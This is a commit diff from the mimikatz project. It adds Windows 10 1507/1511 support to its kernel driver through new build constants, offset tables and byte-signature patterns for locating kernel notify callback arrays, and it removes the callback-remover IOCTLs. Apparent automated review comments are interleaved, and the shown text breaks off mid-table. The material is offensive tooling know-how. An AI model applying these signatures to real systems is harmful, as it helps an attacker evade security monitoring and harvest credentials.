Welcom to Windows 10 LTSB & current
[remove] mimidrv & mimikatz kernel module: the Process & Object callback removers are no longer in the program [internal] Windows 10 is now split into 1507 (LTSB) and 1511 (current) [internal] mimidrv: Windows 10 support added [internal] mimilib WinDBG module & mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are no longer version-specific (offsets table) [internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of a local variable in each function
This commit is contained in:
parent
c1c1608ca8
commit
9e298f16e4
@ -76,7 +76,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
|
||||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
#define KULL_M_WIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_BUILD_10_1507 10240
|
||||
#define KULL_M_WIN_BUILD_10_1511 10586
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
|
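Review bot: The two new build constants carry no comment saying which Windows 10 releases they identify, and dropping `KULL_M_WIN_BUILD_10 9800` means any comparison elsewhere that still names it will no longer compile, while pre-release builds between 9800 and 10239 lose their bucket. I would document the values inline: `#define KULL_M_WIN_BUILD_10_1507 10240 // Windows 10 RTM / LTSB 2015` and `#define KULL_M_WIN_BUILD_10_1511 10586 // Windows 10 November update (1511)`. The build-number-to-index mapping is not in this hunk, so whether builds above 10586 fall through to the 1511 row cannot be confirmed from here.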
@ -34,9 +34,10 @@ typedef enum _KIWI_OS_INDEX {
|
||||
KiwiOsIndex_7 = 4,
|
||||
KiwiOsIndex_8 = 5,
|
||||
KiwiOsIndex_BLUE = 6,
|
||||
KiwiOsIndex_10 = 7,
|
||||
KiwiOsIndex_10_1507 = 7,
|
||||
KiwiOsIndex_10_1511 = 8,
|
||||
|
||||
KiwiOsIndex_MAX = 8,
|
||||
KiwiOsIndex_MAX = 9,
|
||||
} KIWI_OS_INDEX, *PKIWI_OS_INDEX;
|
||||
|
||||
#ifdef _M_IX86
|
||||
|
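Review bot: Raising `KiwiOsIndex_MAX` to 9 silently grows every table declared with `[KiwiOsIndex_MAX]`, such as `MF_OffSetTable`, and a table that was not given a ninth row still compiles — C zero-fills the missing row, so a 1511 lookup would return zero offsets at runtime instead of failing at build time. A comment on the enum would make that contract visible: `// KiwiOsIndex_MAX sizes every per-OS offset table; each such table needs a new row when an index is added here`. If the toolchain accepts C99 designated initializers, writing the table rows as `[KiwiOsIndex_10_1511] = {...}` would bind each row to its index rather than to its position.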
@ -25,9 +25,6 @@
|
||||
#define IOCTL_MIMIDRV_NOTIFY_REG_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x043, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x044, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
|
||||
#define IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x045, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x049, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
|
||||
#define IOCTL_MIMIDRV_FILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x050, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define IOCTL_MIMIDRV_MINIFILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x051, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
|
||||
|
@ -16,7 +16,8 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* 7 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 8 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* BLUE */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 10 */ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1507*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1511*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
@ -25,7 +26,8 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* 7 */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* 8 */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* BLUE */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* 10 */ {0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1507*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1511*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
#endif
|
||||
};
|
||||
|
||||
|
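Review bot: The `10_1507` and `10_1511` rows are byte-for-byte copies of the old `10` row, and on the x64 side `/* 10_1507*/{0x0090` and `/* 10_1511*/{0x0090` dropped the space between comment and brace that every other row keeps. Because the array is sized `[KiwiOsIndex_MAX][MF_MAX]`, nothing ties row order to the enum, so a row inserted in the wrong place or left out would compile and return the wrong offsets. If the toolchain accepts C99 designated initializers, `[KiwiOsIndex_10_1511] = {0x0090, 0x0018, 0x0020, 0x0060},` removes that dependence on position; otherwise a comment above the table, `/* rows must stay in KIWI_OS_INDEX order and count KiwiOsIndex_MAX */`, is the minimum.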
@ -52,7 +52,7 @@ NTSTATUS kkll_m_modules_fromAddr_callback(SIZE_T szBufferIn, PVOID bufferIn, PKI
|
||||
{
|
||||
*mustContinue = FALSE;
|
||||
pStructAddr->isFound = TRUE;
|
||||
status = kprintf(outBuffer, L"0x%p [%S + 0x%08x]\n", (PVOID) pStructAddr->addr, pModule->FullPathName + pModule->FileNameOffset, pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase);
|
||||
status = kprintf(outBuffer, L"0x%p [%S + 0x%x]\n", (PVOID) pStructAddr->addr, pModule->FullPathName + pModule->FileNameOffset, pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
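Review bot: The new `0x%x` conversion in `status = kprintf(outBuffer, L"0x%p [%S + 0x%x]\n", ...)` is fed `pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase`, a `ULONG_PTR` that is 64 bits wide on x64, while `%x` consumes an `unsigned int`; the previous `%08x` had the same mismatch, so this is inherited rather than introduced, but on x64 the output depends on how `kprintf` walks its varargs and at best shows only the low 32 bits. Either narrow the value explicitly, `(ULONG)(pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase)`, or use a pointer-width conversion such as `0x%Ix` if `kprintf` supports the MSVC size specifiers. The body of `kkll_m_modules_fromAddr_callback` begins before this hunk.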
@ -17,35 +17,37 @@ PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL;
|
||||
POB_PRE_OPERATION_CALLBACK kkll_m_notify_fakePre = NULL;
|
||||
POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL;
|
||||
|
||||
|
||||
#ifdef _M_X64
|
||||
UCHAR PTRN_W23_Thread[] = {0x66, 0x90, 0x66, 0x90, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_WVI_Thread[] = {0x49, 0x8b, 0x8c, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x41, 0xb0, 0x01, 0x49, 0x8b, 0x94, 0x24, 0x88, 0x03, 0x00, 0x00};
|
||||
UCHAR PTRN_WI7_Thread[] = {0x41, 0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_WI8_Thread[] = {0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W81_Thread[] = {0x41, 0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_Thread[] = {0x45, 0x33, 0xc0, 0x48, 0x8d, 0x0c, 0xd9, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
UCHAR PTRN_W10_Thread[] = {0x48, 0x8b, 0xcd, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"PsDereferenceKernelStack", L"ExRaiseAccessViolation", {-20, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"PsDereferenceKernelStack", L"MmIsVerifierEnabled", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateThreadNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"PsDereferenceKernelStack", L"ExRaiseAccessViolation", {-20, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"PsDereferenceKernelStack", L"MmIsVerifierEnabled", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Process[] = {0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_WVI_Process[] = {0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
|
||||
UCHAR PTRN_WI7_Process[] = {0x4c, 0x8b, 0xf9, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
|
||||
UCHAR PTRN_WI8_Process[] = {0x8b, 0xc3, 0x48, 0x8d, 0x34, 0xc1, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_W81_Process[] = {0x48, 0x8d, 0x04, 0xc1, 0x48, 0x89, 0x45, 0x70, 0x48, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0x49, 0x8d, 0x0c, 0xc7, 0xe8};
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0x49, 0x8d, 0x0c, 0xc7, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlAreAllAccessesGranted", L"RtlGetIntegerAtom", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Process), PTRN_W10_Process}, L"PsSetCreateProcessNotifyRoutine", L"IoReportDetectedDevice", { -4, 64}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlAreAllAccessesGranted", L"RtlGetIntegerAtom", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PsSetCreateProcessNotifyRoutine", L"IoReportDetectedDevice", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PsSetCreateProcessNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
|
||||
UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
|
||||
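Review bot: `PTRN_W10_Thread` shrinks to four bytes, `{0x48, 0x8b, 0xcd, 0xe8}` — a `mov rcx, rbp` followed by a `call` opcode — which is generic enough to occur more than once inside the `PsRemoveCreateThreadNotifyRoutine`..`PsRemoveLoadImageNotifyRoutine` window, and the `-8` displacement on the 1507/1511 rows is presumably applied to whichever hit the scanner reports first (the search helper is not in this hunk). The 11-byte signature the old `KiwiOsIndex_10` entry used was at least distinctive. If the short pattern is deliberate, a comment stating what was verified would protect it, e.g. `// 4-byte signature: sole occurrence in the search window on 10240 and 10586`, provided that is what was checked. The 1507 and 1511 thread rows are otherwise identical, so the split matters only for `ProcessReferences`, where the two patterns differ.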
@ -54,40 +56,43 @@ UCHAR PTRN_WI8_Image[] = {0xbf, 0x08, 0x00, 0x00, 0x00, 0x41, 0x89, 0x06, 0x0f,
|
||||
UCHAR PTRN_W81_Image[] = {0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0x48, 0x8d, 0x0c, 0xd9, 0xe8};
|
||||
UCHAR PTRN_W10_Image[] = {0x45, 0x33, 0xc0, 0x48, 0x8d, 0x0c, 0xd9, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ImageReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsSetLegoNotifyRoutine", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"NtRequestPort", L"RtlQueryTimeZoneInformation", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"FsRtlReleaseFile", L"IoSetPartitionInformationEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"ExSizeOfRundownProtectionCacheAware", L"MmProbeAndLockProcessPages", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateThreadNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsSetLegoNotifyRoutine", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"NtRequestPort", L"RtlQueryTimeZoneInformation", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"FsRtlReleaseFile", L"IoSetPartitionInformationEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"ExSizeOfRundownProtectionCacheAware", L"MmProbeAndLockProcessPages", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateThreadNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
|
||||
UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
|
||||
UCHAR PTRN_WI7_Object[] = {0x41, 0x8a, 0xde, 0x44, 0x88, 0x74, 0x24, 0x47, 0x88, 0x5c, 0x24, 0x46, 0x4c, 0x89, 0x74, 0x24, 0x38, 0x4c, 0x89, 0x74, 0x24, 0x30, 0x49, 0x8b, 0xee, 0xc7, 0x44, 0x24, 0x48};
|
||||
UCHAR PTRN_WI8_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50};
|
||||
UCHAR PTRN_W81_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50};
|
||||
UCHAR PTRN_W10_Object[] = {0x41, 0x8a, 0xd8, 0x88, 0x5c, 0x24, 0x4e, 0x4d, 0x8b, 0xf0, 0x44, 0x88, 0x44, 0x24, 0x4f};
|
||||
UCHAR PTRN_W10_Object[] = {0x0f, 0xb7, 0x02, 0xff, 0xc9, 0x49, 0x03};
|
||||
KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"ObReferenceSecurityDescriptor", { -4, 0x078, 0x0d8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x228}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObUnRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x0c0}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"IoCreateController", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"ObReferenceSecurityDescriptor", { -4, 0x078, 0x0d8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x228}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObUnRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x0c0}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"IoCreateController", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
};
|
||||
UCHAR PTRN_W23_Reg[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
UCHAR PTRN_WVI_Reg[] = {0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
|
||||
UCHAR PTRN_WI7_Reg[] = {0x48, 0x8b, 0xf8, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x3b, 0xc3, 0x0f, 0x84};
|
||||
UCHAR PTRN_WI8_Reg[] = {0x49, 0x8b, 0x04, 0x24, 0x48, 0x3b, 0x43, 0x18, 0x74};
|
||||
UCHAR PTRN_W81_Reg[] = {0x49, 0x8b, 0x04, 0x24, 0x48, 0x3b, 0x43, 0x18, 0x74};
|
||||
UCHAR PTRN_W10_Reg[] = {0x48, 0x8b, 0x46, 0x08, 0x48, 0x8b, 0x08, 0x48, 0x89, 0x0f, 0x48, 0x89, 0x47, 0x08};
|
||||
UCHAR PTRN_W10_Reg[] = {0x48, 0x8b, 0xf8, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0x85, 0xc0, 0x0f, 0x84};
|
||||
KKLL_M_MEMORY_GENERIC RegReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"CmUnRegisterCallback", { -6}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmUnRegisterCallback", L"SeSetAuthorizationCallbacks", { -9, 0x030}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmUnRegisterCallback", L"CmRegisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmSetCallbackObjectContext", L"CmGetCallbackVersion", { -9, 0x028}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmRegisterCallback", L"IoEnumerateRegisteredFiltersList",{ -13, 0x028}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"CmUnRegisterCallback", { -6}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmUnRegisterCallback", L"SeSetAuthorizationCallbacks", { -9, 0x030}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmUnRegisterCallback", L"CmRegisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmSetCallbackObjectContext", L"CmGetCallbackVersion", { -9, 0x028}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
UCHAR PTRN_WXP_Thread[] = {0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};
|
||||
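Review bot: The `ObjectReferences` rows for 1507 and 1511 change the first displacement from `-4` to `25`, and the matching `PTRN_W10_Object` becomes the seven-byte `{0x0f, 0xb7, 0x02, 0xff, 0xc9, 0x49, 0x03}`, yet nothing records why the reference now lies 25 bytes after the match while every other row in the table uses a small negative offset. A comment on the row such as `// +25: the pointer is read after the matched bytes on 10240/10586, not before them`, or whatever the real reason is, would stop the next build bump from "correcting" it back to `-4`. The x86 table later in this commit labels `ObjectReferences` with `// ObpTypeDirectoryObject`; the x64 table would benefit from the same label.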
@ -97,14 +102,15 @@ UCHAR PTRN_WI7_Thread[] = {0xc7, 0x45, 0x0c, 0x40, 0x00, 0x00, 0x00, 0x56, 0xe8}
|
||||
UCHAR PTRN_WI8_Thread[] = {0xbb, 0x40, 0x00, 0x00, 0x00, 0x8d, 0x1b, 0xe8};
|
||||
UCHAR PTRN_W81_Thread[] = {0xc7, 0x45, 0xa8, 0x40, 0x00, 0x00, 0x00, 0x8b, 0xcf, 0xe8};
|
||||
UCHAR PTRN_W10_Thread[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd3, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Thread), PTRN_WXP_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
